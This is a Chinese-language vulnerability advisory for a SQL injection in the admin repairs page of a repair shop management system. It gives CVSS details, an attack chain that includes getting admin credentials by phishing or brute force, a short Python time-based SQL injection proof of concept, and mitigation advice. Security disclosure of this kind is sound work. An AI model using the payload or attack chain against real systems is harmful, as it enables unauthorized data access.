CVE-2026-36944 CVSS 2.7 低危

CVE-2026-36944: 电脑手机维修店管理系统SQL注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36944

漏洞类型

SQL注入

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Sourcecodester Computer and Mobile Repair Shop Management System

漏洞概述

Sourcecodester Computer and Mobile Repair Shop Management System v1.0 版本存在 SQL 注入漏洞。该漏洞位于 /rsms/admin/repairs/view_details.php 文件中，由于对用户输入缺乏有效的过滤，导致经过身份验证的高权限攻击者可执行恶意 SQL 语句。成功利用此漏洞可能导致敏感数据库信息泄露。

技术细节

该漏洞源于系统在处理 /rsms/admin/repairs/view_details.php 页面请求时，直接将外部输入拼接到 SQL 查询中，未使用参数化查询。根据 CVSS 向量 PR:H，攻击者需要具备高权限（通常是管理员账户）才能访问该特定接口。攻击者可发送特制的 HTTP GET 或 POST 请求，在参数中注入 SQL 语法（如单引号截断、UNION 查询等）。由于漏洞允许读取数据（C:L），攻击者可以提取数据库结构及内容，但无法修改或删除数据（I:N/A:N）。

攻击链分析

STEP 1

1. 信息收集

攻击者发现目标运行 Sourcecodester Computer and Mobile Repair Shop Management System v1.0。

STEP 2

2. 获取权限

由于漏洞需要高权限（PR:H），攻击者通过钓鱼或暴力破解获取管理员后台账号密码。

STEP 3

3. 漏洞利用

攻击者登录后台，访问 /rsms/admin/repairs/view_details.php 接口，并在参数中注入 SQL 恶意代码。

STEP 4

4. 数据窃取

利用注入漏洞读取数据库中的敏感信息，如用户表、维修记录等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-36944
# Target: /rsms/admin/repairs/view_details.php
# Note: Requires High Privilege (Admin)

import requests

target_url = "http://target.com/rsms/admin/repairs/view_details.php"

# Payload to test SQL Injection (Example: Time-based)
payload = "?id=1' AND SLEEP(5)-- -"

cookies = {
    "PHPSESSID": "[ADMIN_SESSION_ID]"
}

try:
    response = requests.get(target_url + payload, cookies=cookies)
    if response.elapsed.total_seconds() > 5:
        print("[+] Vulnerable to SQL Injection")
    else:
        print("[-] Not vulnerable or timeout failed")
except Exception as e:
    print(f"Error: {e}")

影响范围

Sourcecodester Computer and Mobile Repair Shop Management System v1.0

防御指南

临时缓解措施

在官方补丁发布前，建议通过 Web 应用防火墙（WAF）拦截针对 view_details.php 的异常 SQL 请求。同时，应加强对管理员账户的安全防护，防止凭证泄露，因为利用此漏洞需要高权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表